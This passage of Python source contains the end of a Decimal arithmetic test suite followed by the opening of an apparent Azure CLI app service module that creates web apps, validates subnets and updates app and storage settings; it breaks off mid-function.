d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
#inf
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
#coefficient in infinity should be ignored
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_immutability_operations(self):
# Do operations and check that they didn't change internal objects.
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
return
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__div__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__long__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__nonzero__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdiv__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_subclassing(self):
# Different behaviours when subclassing Decimal
class MyDecimal(Decimal):
pass
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertTrue(type(d) is Decimal)
d = d1.max(d2)
self.assertTrue(type(d) is Decimal)
def test_implicit_context(self):
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
class DecimalPythonAPItests(unittest.TestCase):
def test_abc(self):
self.assert_(issubclass(Decimal, numbers.Number))
self.assert_(not issubclass(Decimal, numbers.Real))
self.assert_(isinstance(Decimal(0), numbers.Number))
self.assert_(not isinstance(Decimal(0), numbers.Real))
def test_pickle(self):
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
def test_int(self):
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
def test_trunc(self):
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
class ContextAPItests(unittest.TestCase):
def test_pickle(self):
c = Context()
e = pickle.loads(pickle.dumps(c))
for k in vars(c):
v1 = vars(c)[k]
v2 = vars(e)[k]
self.assertEqual(v1, v2)
def test_equality_with_other_types(self):
self.assert_(Decimal(10) in ['a', 1.0, Decimal(10), (1,2), {}])
self.assert_(Decimal(10) not in ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
class WithStatementTest(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(orig_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(set_ctx.prec == new_ctx.prec, 'did not set correct context')
self.assert_(new_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
context = Context(prec=9, Emin = -999999999, Emax = 999999999,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-1000000009")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
context._raise_error(flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort()
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort()
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_main(arith=False, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init()
global TEST_ALL, DEBUG
TEST_ALL = arith or is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = [
DecimalExplicitConstructionTest,
DecimalImplicitConstructionTest,
DecimalArithmeticOperatorsTest,
DecimalFormatTest,
DecimalUseOfContextTest,
DecimalUsabilityTest,
DecimalPythonAPItests,
ContextAPItests,
DecimalTest,
WithStatementTest,
ContextFlags
]
else:
test_classes = [DecimalTest]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(DecimalTest, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
import decimal as DecimalModule
run_doctest(DecimalModule, verbose)
finally:
setcontext(ORIGINAL_CONTEXT)
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.util import get_az_user_agent, send_raw_request, get_file_json
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (InvalidArgumentValueError, MutuallyExclusiveArgumentError, ResourceNotFoundError,
RequiredArgumentMissingError, ValidationError, CLIInternalError,
UnclassifiedUserFault, AzureResponseError, AzureInternalError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_tier,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager, use_additional_properties, get_app_service_plan_from_webapp,
get_resource_if_exists)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_KEYS, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX,
FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH,
DOTNET_RUNTIME_NAME, NETCORE_RUNTIME_NAME, ASPDOTNET_RUNTIME_NAME, LINUX_OS_NAME,
WINDOWS_OS_NAME)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None, https_only=False):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise ResourceNotFoundError("The plan '{}' doesn't exist in the resource group '{}".format(plan,
resource_group_name))
is_linux = plan_info.reserved
helper = _StackRuntimeHelper(cmd, linux=is_linux, windows=not is_linux)
location = plan_info.location
# If the name refers to an existing webapp, keep its current app settings instead of starting from scratch.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise ValidationError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise ValidationError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
if using_webapp_up:
https_only = using_webapp_up
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=https_only, virtual_network_subnet_id=subnet_resource_id)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise ArgumentUsageError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime, is_linux)
if not match:
raise ValidationError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise ArgumentUsageError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime, linux=is_linux)
if not match:
raise ValidationError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack property in metadata to display the stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
node_default_version = helper.get_default_version("node", is_linux, get_windows_config_version=True)
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a helper for 'az webapp up'
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', with no preceding appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location, vnet_sub_id=None):
from azure.cli.core.commands.client_factory import get_subscription_id
current_sub_id = get_subscription_id(cmd.cli_ctx)
if vnet_sub_id:
cmd.cli_ctx.data['subscription_id'] = vnet_sub_id
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
cmd.cli_ctx.data['subscription_id'] = current_sub_id
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # exactly one of these options may be specified
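# Hypothetical illustration of the validation above (not part of the original source):
#   validate_container_app_create_options(runtime='PYTHON|3.9')                      -> True
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE',
#                                         multicontainer_config_file='compose.yml')  -> True
#   validate_container_app_create_options(runtime='PYTHON|3.9',
#                                         deployment_container_image_name='nginx')   -> False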
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise MutuallyExclusiveArgumentError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add new settings or remove existing ones
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise ValidationError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise ResourceNotFoundError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise ResourceNotFoundError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because, when the plan is created as part of the function app,
# it can take a few attempts before the plan becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
